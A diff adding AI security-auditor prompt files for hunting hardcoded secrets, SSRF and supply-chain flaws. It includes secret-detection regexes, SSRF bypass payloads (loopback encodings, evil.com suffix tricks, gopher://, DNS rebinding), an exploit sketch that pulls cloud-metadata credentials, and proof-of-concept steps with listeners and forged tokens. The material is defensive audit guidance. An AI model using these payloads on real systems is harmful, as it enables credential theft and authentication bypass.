+  any "secret" key in JS/TS that reaches a webpack/vite bundle, React Native,
+  Electron, Android/iOS resources. Server-side secrets in client code = leaked
+  to every user.
+
+Per-language / per-format SINK & literal signals:
+
+- **Crystal:** `Stripe.api_key = "sk_live_..."`, `ENV["X"]? || "fallback"`,
+  hardcoded `HTTP::Headers{"Authorization" => "Bearer ..."}`,
+  `DB.open("postgres://user:pass@host")`, secrets in `shard.yml`/`config/*.cr` constants.
+- **Ruby:** `Stripe.api_key = "sk_live_..."`, `ENV.fetch("X", "default-secret")`,
+  `secret_key_base` literal in `config/secrets.yml`/`credentials`,
+  `config.secret_key_base = "..."`, `Net::HTTP` basic-auth literals,
+  `Aws::Credentials.new("AKIA...", "secret")`, seeds with `password: "admin"`.
+- **Node/TS:** `const API_KEY = "..."`, `process.env.X || "hardcoded"`,
+  `new Stripe("sk_live_...")`, `jwt.sign(p, "supersecret")`, `axios` headers with
+  literal Bearer, `mongoose.connect("mongodb://u:p@...")`, secrets in
+  `next.config.js`/`vite` defines that ship to the client, `NEXT_PUBLIC_*`/`VITE_*`
+  vars holding real secrets (these are bundled and public).
+- **Python:** `API_KEY = "..."`, `os.getenv("X", "fallback-secret")`,
+  `SECRET_KEY = "..."` (Django/Flask) literal, `boto3` `aws_access_key_id=
+  "AKIA..."`, `psycopg2.connect("postgresql://u:p@...")`, `stripe.api_key=`,
+  hardcoded `Authorization` in `requests` headers, `Fernet(b"hardcoded-key")`.
+- **Go:** `const apiKey = "..."`, `os.Getenv("X")` with `if x == "" { x =
+  "default" }`, `aws.Credentials{AccessKeyID:"AKIA...", SecretAccessKey:"..."}`,
+  DSN string literals `"user:pass@tcp(...)"`, `jwt` signing with a string-literal
+  key, `http.Request` with hardcoded bearer.
+- **PHP:** `define('DB_PASSWORD', '...')` / `wp-config.php`, `$apiKey = "..."`,
+  `getenv('X') ?: 'default'`, Laravel `config/*.php` returning literals instead of
+  `env()`, `.env` committed with `APP_KEY=`, PDO DSN with creds.
+- **Java/Kotlin:** `String API_KEY = "..."`, `application.properties`/`.yml`
+  `spring.datasource.password=...`, `new BasicAWSCredentials("AKIA...", "...")`,
+  `Jwts.builder().signWith(SignatureAlgorithm.HS256, "literal-secret")`,
+  keystore passwords inline, Android `BuildConfig`/`strings.xml` with API keys.
+- **Rust:** `const API_KEY: &str = "..."`, `env::var("X").unwrap_or("default".into())`,
+  reqwest `bearer_auth("literal")`, sqlx/`DATABASE_URL` literal with creds,
+  `jsonwebtoken` `EncodingKey::from_secret(b"literal")`.
+
+High-confidence provider fingerprints (verify liveness, don't flag blindly):
+`AKIA[0-9A-Z]{16}` (AWS access key), `sk_live_`/`rk_live_` (Stripe live),
+`xox[baprs]-` (Slack), `ghp_`/`gho_`/`github_pat_` (GitHub PAT),
+`AIza[0-9A-Za-z\-_]{35}` (Google API), `SG.` (SendGrid), `-----BEGIN (RSA|EC|OPENSSH|PGP) PRIVATE
+KEY-----`, `eyJ...` long-lived JWTs, `glpat-` (GitLab), `npm_` (npm token),
+`xapp-`/`xoxe` (Slack app), `key-[0-9a-f]{32}` (Mailgun), `dop_v1_` (DigitalOcean).
+
+## 3. Detection heuristics
+
+**Taint perspective.** This class is largely *presence-driven*, not flow-driven:
+the SOURCE is the attacker's read access to the repo/artifact, and the SINK is
+the embedded secret that grants access to an external resource. Frame each
+finding around **what the secret unlocks and who can read the secret.**
+
+- **SOURCE** = the attacker's read path to the literal: a public/forked repo, a
+  leaked or shared source tree, a published package (`npm pack`, `gem`, PyPI
+  sdist), a shipped client bundle/binary/mobile APK/desktop app, the CI logs, or
+  git history. Name the actual path ("repo is public", "value ships in the React
+  bundle served to all users", "old `.env` still in history at commit `abc123`").
+- **SINK** = the protected resource the secret authenticates to: the cloud
+  account (AWS/GCP), payment processor, email/SMS sender, third-party API quota,
+  the production DB, the app's own JWT/session/encryption that the secret signs,
+  or admin login via a default credential. State the concrete impact of holding
+  the secret.
+
+Vulnerable patterns to confirm (each needs a real secret + a real read path):
+
+- **Live third-party API key/token in code or config (CWE-798):** a usable
+  Stripe/AWS/Slack/SendGrid/Twilio/OpenAI/GitHub key as a literal. Highest value
+  when it's a *live secret* (not `test`/`pk_`/public) and the repo is reachable.
+  Confirm the prefix/format implies a live secret and the surrounding code uses
+  it against the real provider.
+- **Hardcoded password / connection string (CWE-259):** DB/SMTP/LDAP/Redis/MQ
+  credentials inline or in a committed config — `postgres://user:pass@host`,
+  `spring.datasource.password=...`, `DB_PASSWORD` literal. Reachable = the host
+  is network-reachable from where the attacker stands (often it is internally;
+  for a public repo of an internal app, still report — the creds are the leak).
+- **Hardcoded cryptographic / signing key (CWE-321):** the app's own JWT/session/
+  cookie/HMAC/encryption secret as a literal or framework default (`SECRET_KEY=
+  "django-insecure-..."`, `secret_key_base`, `signWith("secret")`). Holding it
+  lets an attacker forge tokens/cookies for any user → auth bypass. (When the
+  *crypto operation* is the bug, that's `crypto`; here the bug is the key being
+  knowable. Report under whichever the path centers on; cross-link in rationale.)
+- **Weak / default credential shipped (CWE-798/1392):** seeded `admin/admin`,
+  empty root password, `|| "changeme"` fallback that activates when the env var
+  is unset (and prod commonly leaves it unset), default framework secret used
+  when config is blank. Confirm the default path is *reachable in prod* — an
+  unset-env fallback that silently runs in production IS a finding.
+- **Secret in git history not rotated (CWE-798):** a key/`.env`/`.pem` deleted
+  from HEAD but present in history and never rotated at the provider. Removal ≠
+  rotation. Confirm via `git log -p`/`git rev-list --all -- <path>` that the
+  value is reachable and there's no evidence it was rotated.
+- **Server secret leaked to a client (CWE-798):** a secret meant for the server
+  that ends up in a browser/mobile/desktop bundle (`NEXT_PUBLIC_`/`VITE_`
+  prefixed real secret, key inlined in client JS, Android `strings.xml` API key).
+  Every user holds it. Distinguish from intentionally-public keys (publishable
+  Stripe `pk_`, Firebase web config, Google Maps browser key with referrer
+  restrictions — those are *designed* to be client-side, see §4).
+- **Committed private key / keystore (CWE-321):** any `-----BEGIN ... PRIVATE
+  KEY-----`, `*.p12`/`*.jks` with the password also committed, SSH host/deploy
+  keys, GCP service-account JSON. The private half being in the repo defeats it.
+
+## 4. Not-a-finding (false-positive guard) — check BEFORE flagging
+
+Do NOT report if any of these holds:
+
+- **Not actually secret material:** a public/publishable key by design — Stripe
+  `pk_*` publishable key, Firebase web `apiKey` (it's an identifier, not a
+  secret; security is in rules), Google Maps/Analytics browser keys (restricted
+  by HTTP referrer/API), Sentry public DSN, OAuth *client_id* (public),
+  reCAPTCHA *site* key, public PGP/TLS *public* keys/certs. A `pk_`/`pub`/`site`/
+  `client_id` is not the secret half — verify which half you're looking at.
+- **Obvious placeholder / example / template:** `your-api-key-here`,
+  `xxx`/`<changeme>`, `sk_test_...` test-mode keys, values in `.env.example`/
+  `.env.sample`/`*.dist`/`*.template`/`README` snippets, RFC/docs example keys
+  (`AKIAIOSFODNN7EXAMPLE` is the canonical AWS docs sample — never live). Match
+  against known doc/example sentinels and obvious dummy patterns.
+- **Test fixtures / mocks / specs:** secrets confined to `test/`/`spec/`/
+  `__tests__/`/`fixtures/`/`*_test.*` that point only at a mock server or local
+  test container and are never the production value. Confirm no prod wiring uses
+  the same literal.
+- **Sourced from real secret management at runtime:** the literal you see is a
+  *variable read*, not a value — `ENV["X"]`/`os.getenv`/`process.env.X`/Vault/
+  KMS/SSM/Secrets Manager/Doppler/`credentials.yml.enc` (sealed) fetch. Reading
+  from a secret store is the correct pattern, not a finding. (A *fallback default*
+  on the read still IS a finding — see §3.)
+- **Already rotated / dead secret:** the value is demonstrably revoked (provider
+  returns 401, key deleted at source, commit message/ticket confirms rotation),
+  or it's a one-time-use value with no standing access. Removal from HEAD alone
+  is NOT rotation — only count as dead if the *provider-side* credential is gone.
+- **Low-entropy non-secret constants:** feature-flag strings, enum values, public
+  URLs, version strings, salts/IVs that are *meant* to be public (a salt stored
+  alongside a hash is by design not secret), cache keys — none are credentials.
+- **Encrypted-at-rest secret stores:** `credentials.yml.enc`, `git-crypt`/`sops`/
+  `ansible-vault`/`sealed-secrets` blobs where the *decryption key* is NOT also in
+  the repo. The encrypted blob is safe; only flag if the master key is committed
+  too.
+
+If a "mitigation" is bypassable — a fallback default that runs in prod, a "test"
+key that the README says to also use in staging, a sops file whose age key is
+committed two dirs over, a `pk_` that's actually the `sk_` mislabeled — it is NOT
+a mitigation. Flag it and name the exact bypass in `sanitizers_checked`.
+
+## 5. Severity guidance
+
+- **Critical** — a **live secret granting broad/unauth, high-impact access** that
+  an attacker can read now: live AWS/GCP root or broad-IAM key, live payment
+  processor secret (`sk_live_`), production DB admin connection string,
+  committed private key controlling prod, or the app's JWT/session signing secret
+  (forge any user's auth) — when the repo/artifact is public or widely shared.
+- **High** — a live secret with meaningful but scoped access, or a default/weak
+  credential reachable in prod: scoped API token (single-service), SMTP/SendGrid
+  send key (spoof mail), internal DB creds in a leaked repo, a `|| "changeme"`
+  fallback that activates when prod leaves the env unset, server secret leaked
+  into a shipped client bundle.
+- **Medium** — secret with limited scope/short life or guarded reach: a key with
+  tight provider-side restrictions, creds for an isolated/non-prod system that's
+  still reachable, secret only in history of a private repo with limited
+  audience, default cred behind an extra auth layer.
+- **Low/Info** — placeholder/example/test-only value (usually drop per §4),
+  rotated/dead secret, or an intentionally-public key flagged by a scanner —
+  note for hygiene, do not put in the body.
+
+## 6. Emit findings as
+
+One JSON object per distinct secret (dedup the same value across files; list the
+locations in `rationale`). Fields:
+
+```json
+{
+  "id": "secrets-001",
+  "title": "Live Stripe secret key hardcoded in payment service — full account access",
+  "vuln_class": "secrets",
+  "owasp": "A02:2025",
+  "cwe": "CWE-798",
+  "asvs": "V14",
+  "severity": "critical",
+  "status": "likely",
+  "confidence": "high",
+  "file": "src/services/billing.ts",
+  "line": 12,
+  "end_line": 12,
+  "code_excerpt": "const stripe = new Stripe(\"sk_live_51H...REDACTED...\");",
+  "source": "repo is public on GitHub (and the value also ships in the deployed source tree); any reader of the repo or a leaked checkout obtains the key",
+  "sink": "Stripe live secret API key — full read/write to the org's Stripe account: charges, refunds, customer PII, payout config",
+  "data_flow": "literal sk_live_ key -> Stripe client constructor -> used for live API calls in createCharge(). Key is the standing credential; reading the source = holding it. No env/Vault indirection on this assignment.",
+  "sanitizers_checked": "prefix is sk_live_ (live, not pk_ publishable nor sk_test_); not read from process.env (it's a literal); not in a test/fixture dir; not a documented example sentinel; no evidence of provider-side rotation in history or commit messages",
+  "rationale": "Genuine live secret, broadly scoped, in a reachable repo. Same key reused at src/jobs/reconcile.ts:8. Single root cause: the inlined key.",
+  "exploit_sketch": "Clone the repo, extract sk_live_..., call Stripe API (e.g. GET /v1/charges, POST /v1/refunds) with it — exfiltrate customer PII and issue refunds/charges, draining the account.",
+  "dynamic_poc_plan": "Against an isolated copy, issue a harmless authenticated Stripe call with the key (e.g. GET /v1/account) and show it returns 200 with the live account id — proving the key is live and usable. Do NOT mutate real data; a 200 on a read is sufficient proof.",
+  "proposed_fix": "The committed live key must be treated as compromised and stop being a standing credential in the repo: rotate it at the provider and move secret material out of source into a runtime-injected secrets store. Direction only — the exact rotation/history-purge/loading mechanics are left to the engineer who picks this up."
+}
+```
+
+Accuracy bar: `source`, `sink`, `data_flow`, and `sanitizers_checked` must be
+concrete and true. State *who can read the secret and how* (`source`), *what the
+secret unlocks* with the concrete resource/impact (`sink`), how the literal
+becomes the standing credential (`data_flow`), and which §4 guard you confirmed
+absent — especially "is this actually the secret half / a live value / not a
+placeholder / not an env read" (`sanitizers_checked`). A string that merely
+*looks* high-entropy with no resource it unlocks and no read path is NOT a
+finding. Pick `cwe` by what the secret is: 798 generic API key/token/credential,
+259 a password, 321 a cryptographic/signing key, 547 a hard-coded sensitive
+constant used in a security decision. Use `status:"likely"` for a strong static
+trace (live-format secret + reachable path), `"confirmed"` only after a dynamic
+liveness check, `"triage"` when liveness or the read path is uncertain (e.g.
+unknown if the repo is public, or you can't tell test from prod value).
+
+## 7. Dynamic PoC strategy
+
+Goal: prove the secret is **real, live, and grants access** — not just that a
+high-entropy string exists. Pick the oracle for the secret type; prefer
+read-only / non-destructive probes:
+
+1. **Third-party API key/token.** Make the provider's cheapest *authenticated
+   read* call with the key. **Observed proof** = AWS `sts get-caller-identity`
+   returns an account/ARN; Stripe `GET /v1/account` returns 200 + account id;
+   GitHub `GET /user` (or `/rate_limit` showing an authenticated quota) returns
+   the token's identity/scopes; SendGrid `GET /v3/scopes` lists send perms. A
+   200 with the account/identity proves the key is live and what it unlocks.
+   Never run destructive/mutating calls against real accounts.
+2. **DB / service connection string.** From an isolated network position that
+   matches the documented deployment, attempt a connect with the credentials
+   (read-only query like `SELECT 1`). **Observed proof** = the connection
+   succeeds / auth passes — proving the creds are valid. If the host isn't
+   reachable from the harness, fall back to confirming the format and that the
+   app itself uses these exact creds to connect at boot.
+3. **App's own signing/encryption secret.** Use the committed secret to forge an
+   artifact the running app must reject if the secret were unknown: sign a JWT /
+   session cookie / HMAC for a victim/admin identity with it, then send it to the
+   live app. **Observed proof** = the app accepts the forged token and returns
+   the victim's data / an authenticated session — auth bypass. (Overlaps `crypto`
+   §7 #5/#6; cite there if the operation is the bug.)
+4. **Default / weak credential.** Drive the live login/admin endpoint with the
+   default pair (`admin/admin`, seeded password, or the fallback that activates
+   when the env var is unset). **Observed proof** = authentication succeeds and
+   you reach a privileged area.
+5. **Secret in git history / client bundle.** Extract the value from history
+   (`git show <commit>:<path>`) or from the built client bundle, then run the
+   matching oracle above (1–4) to prove it's still live. **Observed proof** = the
+   recovered-from-history/bundle value passes the provider/app liveness check.
+
+Record the exact command and observed evidence in the `Repro` object
+(`reproduced`, `method:"live-exploit"`, `poc`, `observed`, `impact`). A
+read-only provider call returning the account/identity, or the live app
+accepting a forged token / default login, proves the class — set
+`method:"live-exploit"`. If the provider/app can't be reached, fall back to
+proving the value is a live-format secret and is wired into prod use (not a
+test/placeholder) and set `method:"static-poc"`. NEVER perform destructive,
+data-mutating, or billable actions against real third-party accounts to prove a
+finding — a read-only liveness check is sufficient and required.
diff --git a/plugins/security/prompts/finders/ssrf.md b/plugins/security/prompts/finders/ssrf.md
new file mode 100644
index 0000000..4ad4814
--- /dev/null
+++ b/plugins/security/prompts/finders/ssrf.md
@@ -0,0 +1,251 @@
+<!--
+FINDER PROMPT — ssrf. You are a fresh-context auditor hunting ONE class:
+Server-Side Request Forgery. Read the target's code; emit finding objects.
+Signal discipline (AGENTS.md) is binding: only a REACHABLE untrusted-input →
+network-fetch sink with no effective SSRF control on the path is a finding.
+No defense-in-depth musings, no dead code, no posture items.
+-->
+
+# Finder — Server-Side Request Forgery (ssrf)
+
+**Class key:** `ssrf` · **OWASP:** A01:2025 · **CWE:** CWE-918 · **ASVS:** V4
+
+## 1. Objective
+
+Find places where a server-side HTTP/network request targets a URL, host, or
+port that an untrusted caller can influence, such that the attacker can make the
+server reach internal hosts, cloud metadata, or arbitrary external endpoints.
+The bug is the server fetching an attacker-chosen destination — not what comes
+back.
+
+## 2. Where to look
+
+Entry points where a request param/body/header/webhook payload becomes (part of)
+a fetch target:
+
+- **Webhooks / callbacks:** user-registered `callback_url`, `webhook_url`,
+  `notify_url`, OAuth `redirect_uri` used server-side, Slack/Stripe-style event
+  callbacks the server POSTs to.
+- **URL-fetch features:** "import from URL", link unfurl/preview, OG/metadata
+  scrapers, RSS/feed fetchers, avatar/image proxies, HTML→PDF renderers, file
+  upload "from URL", SSO metadata/JWKS/OIDC discovery fetched from a tenant-
+  supplied URL.
+- **Proxies / gateways:** `/proxy?url=`, `/fetch?target=`, image resizers,
+  health-check / reachability probes, "test connection" buttons for
+  user-configured integrations (DB hosts, S3 endpoints, SMTP, webhooks).
+- **Server-side rendering / parsers:** XML/SVG/HTML processors that follow
+  external entities or remote `<img>`/`<xsl:import>`/`<xsl:include>` references
+  (XXE overlaps; flag the outbound fetch).
+- **Cloud / infra glue:** code that reads `169.254.169.254`,
+  `metadata.google.internal`, `100.100.100.100` (Alibaba), or `fd00:ec2::254`;
+  STS/IMDS token fetchers whose base is configurable.
+
+Route/handler patterns to grep: params named `url`, `uri`, `link`, `src`,
+`target`, `dest`, `endpoint`, `host`, `callback`, `webhook`, `image`, `feed`,
+`redirect`, `next`, `return_to`, `domain`, `addr`, `proxy`.
+
+Per-language fetch/client signals:
+
+- **Crystal:** `HTTP::Client.get/post/exec`, `HTTP::Client.new(uri)`, `Crest`,
+  `Halite`.
+- **Ruby:** `Net::HTTP`, `open-uri` `URI.open`/`open(url)`, `Faraday`,
+  `HTTParty`, `RestClient`, `httprb`, `Excon`, `Down.download`,
+  `Mechanize`.
+- **Node/TS:** `fetch`, `axios`, `got`, `node-fetch`, `request`, `superagent`,
+  `undici.request`, `http(s).get/request`, `needle`.
+- **Python:** `requests.get/post`, `urllib.request.urlopen`, `httpx`,
+  `aiohttp.ClientSession.get`, `urllib3.PoolManager.request`, `pycurl`.
+- **Go:** `http.Get/Post`, `client.Do(req)`, `http.NewRequest`, `net.Dial`,
+  `(&http.Client{}).Get`.
+- **PHP:** `file_get_contents($url)`, `curl_exec` (after `curl_setopt
+  CURLOPT_URL`), `fopen($url)`, `Guzzle` `$client->request`, `fsockopen`.
+- **Java:** `new URL(s).openStream/openConnection`, `HttpClient.send`,
+  `HttpURLConnection`, `RestTemplate.getForObject`, `OkHttpClient`,
+  `WebClient.get().uri()`, `Jsoup.connect(url)`.
+- **Rust:** `reqwest::get`/`Client::get`, `hyper::Client`, `ureq::get`,
+  `isahc`, `surf`.
+
+## 3. Detection heuristics
+
+**Taint SOURCES** (untrusted): HTTP request query/body/path/header values, JSON
+fields, webhook registration data, multipart fields, message-queue payloads,
+DB rows that were originally user-set (stored SSRF), file uploads parsed for
+URLs (SVG/XML/HTML/Markdown), and `Location`/redirect targets the client/server
+follows.
+
+**Taint SINKS** (dangerous op): any of the fetch/client calls in §2 whose URL,
+scheme, host, or port derives from a source — including the **resolved IP**
+after a hostname check, and the **redirect target** an HTTP client auto-follows.
+
+Vulnerable patterns to confirm:
+
+- Source flows directly into a client call:
+  - Ruby: `Net::HTTP.get(URI(params[:url]))` / `URI.open(params[:url])`
+  - Node: `await axios.get(req.query.url)` / `fetch(req.body.callback)`
+  - Python: `requests.get(request.args["target"])`
+  - Go: `http.Get(r.URL.Query().Get("url"))`
+  - PHP: `file_get_contents($_GET['url'])` / `curl_setopt($c, CURLOPT_URL,
+    $_POST['u'])`
+  - Java: `new URL(req.getParameter("url")).openStream()` /
+    `restTemplate.getForObject(userUrl, String.class)`
+  - Crystal: `HTTP::Client.get(env.params.query["url"])`
+  - Rust: `reqwest::get(&payload.url).await`
+- **Host allowlist by string prefix/suffix** — bypassable:
+  `url.startsWith("https://api.internal")` (→ `https://api.internal.evil.com`),
+  `host.endsWith("trusted.com")` (→ `trusted.com.evil.com`),
+  `url.includes("trusted.com")` (→ `evil.com/?x=trusted.com`).
+- **Denylist only** (deny `localhost`/`127.0.0.1` but allow everything else):
+  trivially bypassed via `0.0.0.0`, `0`, `127.1`, `[::1]`, `2130706433`
+  (decimal), `0x7f000001` (hex), `127.0.0.1.nip.io`, or any internal RFC1918
+  host the denylist forgot.
+- **Validate-then-fetch TOCTOU / DNS rebinding:** code resolves/validates the
+  hostname, then a *separate* client call re-resolves it. Attacker's DNS returns
+  a public IP at validation time, an internal IP at fetch time. Signal: the
+  validated value is the **hostname/URL string**, and the fetch does its own DNS
+  (the normal case for every HTTP client). Connecting by validated *IP* with
+  `Host` header preserved is the safe pattern.
+- **Redirect-following:** client validates the initial URL but follows 30x
+  redirects to an internal target (Node `redirect:'follow'` default, Python
+  `requests` `allow_redirects=True` default, Go default `CheckRedirect`,
+  curl `CURLOPT_FOLLOWLOCATION`). Flag if no per-hop revalidation.
+- **Scheme abuse:** no scheme allowlist → `file://`, `gopher://`, `dict://`,
+  `ftp://`, `ldap://`, `http://[::ffff:169.254.169.254]`. `gopher://`/`dict://`
+  enable raw TCP to internal services (Redis, etc.).
+- **Partial URL construction:** base is fixed but attacker controls the path/
+  host segment: `"https://" + userHost + "/api"`, or `URI.join(base,
+  userPath)` where `userPath` is an absolute URL/`//evil.com` and replaces the
+  host.
+
+## 4. Not-a-finding (false-positive guard) — check BEFORE flagging
+
+Do NOT report if any of these is present AND effective on the path:
+
+- **Closed allowlist of exact hosts** compared after parsing the URL (parse →
+  read `.host`/`.hostname` → exact-match against a fixed set), not substring/
+  prefix/suffix matching. Allowlisting the *registrable domain* via a real
+  parser is acceptable.
+- **Resolve-then-pin:** code resolves the hostname to an IP, rejects the request
+  if the IP is private/loopback/link-local/CGNAT/multicast/reserved (checks
+  `169.254.0.0/16`, `127.0.0.0/8`, `10/8`, `172.16/12`, `192.168/16`,
+  `100.64/10`, `::1`, `fc00::/7`, `fe80::/10`, `0.0.0.0/8`, IPv4-mapped IPv6),
+  **and then connects to that validated IP** (not re-resolving the name) — this
+  closes both IMDS and DNS-rebinding. A vetted SSRF-filter library counts:
+  Ruby `resolv`-based pin + `private_address_check`, Node `ssrf-req-filter`/
+  custom `lookup` pinning, Python `requests` with a pinned `HTTPAdapter`/socket
+  guard, Go `DialContext` with a `Control` hook rejecting private IPs, Java
+  custom `SocketFactory`/validating resolver.
+- **Redirects disabled or revalidated per hop:** `allow_redirects=False`,
+  `redirect:'manual'`, `CheckRedirect` returning `ErrUseLastResponse`,
+  `CURLOPT_FOLLOWLOCATION=0`, or a redirect handler that re-runs the IP pin on
+  every hop.
+- **Scheme allowlist** restricting to `http`/`https` (rejecting `file`,
+  `gopher`, `dict`, etc.) — necessary but not sufficient; still need host
+  control.
+- **No untrusted source on the path:** URL is a hardcoded constant, an
+  env/config value set by operators, or a fixed internal service base with only
+  a path appended that cannot escape the host (no leading `/`/`//`/scheme
+  injection). Constant IMDS fetches by the cloud SDK (no user input) are not
+  findings.
+- **Egress controlled at the network layer** in a way the code relies on:
+  outbound traffic forced through an authenticated forward proxy that itself
+  enforces the allowlist, or IMDSv2 hop-limit/PUT-token required and the code
+  never forwards user-controlled headers. Only credit this if verifiable in the
+  repo (proxy config, `no_proxy` rules); do not assume network controls.
+- **Egress is intentional & unprivileged by design:** e.g. a public link-preview
+  service that is explicitly documented as fetching arbitrary public URLs *and*
+  pins away from internal ranges. That case is mitigated; report it only if the
+  pin is missing/bypassable.
+
+If a guard exists but is bypassable (substring match, denylist-only, validate-
+then-re-resolve, redirects still followed), it is NOT a mitigation — flag it and
+name the bypass in `sanitizers_checked`.
+
+## 5. Severity guidance
+
+- **Critical** — unauthenticated reachable SSRF that can hit cloud metadata
+  (`169.254.169.254` / GCP `metadata.google.internal` / Azure IMDS) to steal
+  credentials, OR `gopher`/`dict`/raw-socket reach to an internal datastore
+  enabling RCE/full internal compromise. Attacker fully controls host+scheme.
+- **High** — authenticated or realistically-conditioned SSRF with broad internal
+  reach (arbitrary internal host:port, blind or full-response), or a webhook/
+  callback that reaches internal services; metadata blocked but internal network
+  exposed.
+- **Medium** — constrained SSRF: scheme locked to http/https and a partial
+  control (path-only, port-restricted, or a denylist that blocks the obvious
+  internal ranges but is bypass-prone), or blind SSRF with no useful response
+  oracle and limited internal exposure.
+- **Low/Info** — fetch of attacker URL where destination is provably limited to
+  public egress with effective internal-range pinning, leaving only minor info
+  leak (e.g. egress IP / SSRF-as-port-scan with no internal reach). Usually a
+  defense-in-depth note, not a body finding.
+
+Stored/second-order SSRF (tenant-configured webhook fetched later) keeps the
+severity of its reach; note the persistence in `rationale`.
+
+## 6. Emit findings as
+
+One JSON object per distinct root cause (dedup call sites; list extras in
+`rationale`). Fields:
+
+```json
+{
+  "id": "ssrf-001",
+  "title": "Unauthenticated URL-preview fetches attacker-controlled host (IMDS reachable)",
+  "vuln_class": "ssrf",
+  "owasp": "A01:2025",
+  "cwe": "CWE-918",
+  "asvs": "V4",
+  "severity": "critical",
+  "status": "likely",
+  "confidence": "high",
+  "file": "app/services/link_preview.rb",
+  "line": 42,
+  "end_line": 47,
+  "code_excerpt": "res = Net::HTTP.get(URI(params[:url]))",
+  "source": "params[:url] — unauthenticated POST /preview body, no auth filter on route",
+  "sink": "Net::HTTP.get(URI(...)) — server-side HTTP GET to caller-chosen host",
+  "data_flow": "params[:url] -> URI(params[:url]) -> Net::HTTP.get; no host/IP validation; HTTP client performs its own DNS so even a parse check would be rebindable",
+  "sanitizers_checked": "no scheme allowlist (file:// reachable); no host allowlist; no private-IP/IMDS denylist; redirects followed by default (Net::HTTP wrapper retries Location); 169.254.169.254 not blocked",
+  "rationale": "Reachable from unauth route; attacker sets url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ to exfiltrate role creds via the rendered preview. Same sink at link_preview.rb:88 (RSS path).",
+  "exploit_sketch": "POST /preview {\"url\":\"http://169.254.169.254/latest/meta-data/iam/security-credentials/<role>\"} -> response body echoes returned creds in the preview card.",
+  "dynamic_poc_plan": "Stand up a local listener and a fake-IMDS at 169.254.169.254 (or point url at the harness callback); send the request; confirm server connects to the chosen host and surfaces/relays the body.",
+  "proposed_fix": "Constrain the fetch so an untrusted caller can no longer choose an internal destination: validate the target against an SSRF-safe host/IP policy (no metadata/private ranges) and prevent redirect-based escape. High-level direction, not a patch — leave exact implementation to the engineer."
+}
+```
+
+Accuracy bar: `source`, `sink`, `data_flow`, and `sanitizers_checked` must be
+concrete and true. `data_flow` traces variables source→sink and names any guard
+encountered and why it fails. `sanitizers_checked` is the FP guard made
+explicit — list each §4 control and state it is absent or, if present, name the
+exact bypass. A finding without an untrusted source reaching a real fetch sink
+is not a finding. Use `status:"likely"` for a proven static trace, `"confirmed"`
+only after dynamic repro, `"triage"` if reachability/source is uncertain.
+
+## 7. Dynamic PoC strategy
+
+Goal: prove the running server makes a request to a destination the attacker
+chose. Two oracles, in order of preference:
+
+1. **Out-of-band callback (works for blind SSRF):** start a listener the auditor
+   controls (`python3 -m http.server`, `nc -lvnp`, or a unique webhook URL the
+   harness records). Send the request with the SSRF param pointed at it
+   (`url=http://<listener-host>:<port>/ssrf-<nonce>`). **Observed proof:** the
+   listener logs an inbound hit carrying the nonce, originating from the server.
+   Confirms server-initiated fetch of an attacker-chosen target.
+2. **Internal-reach / metadata oracle:** point the param at an internal target
+   the auditor stands up in the isolated worktree network — e.g. a stub HTTP
+   service on a private IP, or a fake-metadata endpoint bound to a private
+   address — and request a known path. **Observed proof:** the HTTP response (or
+   error timing/length for blind cases) reflects content only an internal-
+   reaching request could obtain (e.g. the stub's marker body, or a connect to
+   `127.0.0.1:<internal-port>` succeeding while a public bogus port is refused).
+
+Bypass checks to actually run when a guard exists: substring-allowlist evasion
+(`https://trusted.com.<listener>`), denylist evasion (`http://127.1`,
+`http://0`, decimal/hex IP, `http://[::1]`), DNS-rebinding (serve a TTL-0 name
+that flips public→private between validation and fetch), redirect bounce (point
+at `http://<listener>/r` that 302s to `http://169.254.169.254/...` and watch the
+second hop fire). Record the exact request and the observed evidence in the
+`Repro` object (`reproduced`, `method:"live-exploit"`, `poc`, `observed`,
+`impact`). If only OOB confirmation is possible, that still proves SSRF — set
+`method:"live-exploit"` and note blindness in `notes`.
diff --git a/plugins/security/prompts/finders/supply-chain.md b/plugins/security/prompts/finders/supply-chain.md
new file mode 100644
index 0000000..fc5b53d
--- /dev/null
+++ b/plugins/security/prompts/finders/supply-chain.md
@@ -0,0 +1,371 @@
+<!--
+FINDER PROMPT — supply-chain. You are a fresh-context auditor hunting ONE class:
+Software Supply Chain & CI/CD Failures. Read the target's dependency manifests,
+lockfiles, CI/CD workflows, and install scripts; emit finding objects. Signal
+discipline (AGENTS.md) is binding: only a REACHABLE path from an untrusted origin
+(a malicious PR/fork, a compromised/typosquatted dependency, an attacker-published
+package version) to a dangerous sink (code execution in CI with secrets/write
+token, code execution at install time, or a known-exploitable vuln in a code path
+the app actually reaches) — with no effective guard — is a finding. Posture/process
+items (missing SBOM, no SECURITY.md, no Dependabot, low maintainership, missing
+pinning *as hygiene*) go to the Info appendix, NOT the body. No "upgrade everything"
+churn, no CVEs in dev-only/unreached code reported as High, no dead workflows.
+-->
+
+# Finder — Software Supply Chain & CI/CD (`supply-chain`)
+
+**Class key:** `supply-chain` · **OWASP:** A03:2025 (Software Supply Chain Failures) · **CWE:** CWE-1104 (use of unmaintained third-party components) / CWE-1357 (reliance on insufficiently trustworthy component) / CWE-829 (inclusion of functionality from untrusted control sphere) / CWE-506 (embedded malicious code) · **ASVS:** V15 (Secure Coding & Architecture — dependency & build integrity)
+
+## 1. Objective
+
+Find the path by which untrusted code or untrusted input enters the build/CI or the
+shipped artifact and reaches a privileged sink: a dangerous workflow trigger that runs
+attacker-controlled code with repo secrets / a write-scoped `GITHUB_TOKEN`, a `${{ }}`
+expression injected into a shell, an over-broad token, an unpinned/typosquattable
+dependency or Action, a malicious or attacker-overridable lifecycle/install script, or
+a *known-exploitable* dependency CVE that the app's own code actually invokes. The bug
+is a real CI-execution-with-secrets or install-time-RCE or reachable-vuln path — not the
+mere absence of pinning, an SBOM, or a security policy.
+
+## 2. Where to look
+
+Four surfaces: (A) CI/CD workflow definitions, (B) dependency manifests + lockfiles,
+(C) lifecycle/install/build scripts, (D) the integrity of how artifacts are fetched.
+
+- **CI/CD workflows:** `.github/workflows/*.yml|*.yaml`, composite/reusable actions
+  (`action.yml`), `.gitlab-ci.yml`, `Jenkinsfile`, `.circleci/config.yml`,
+  `azure-pipelines.yml`, `.drone.yml`, `bitbucket-pipelines.yml`, Forgejo/Gitea
+  `.forgejo/workflows/*`/`.gitea/workflows/*` (same `${{ }}` + action model as GHA),
+  `Taskfile`/`Makefile`/`Rakefile` targets invoked by CI.
+- **Dependency manifests + lockfiles** (presence of a lockfile is what makes a
+  known-vuln/pinning claim checkable):
+  - **Node/TS:** `package.json` (`dependencies`, `devDependencies`, `scripts`,
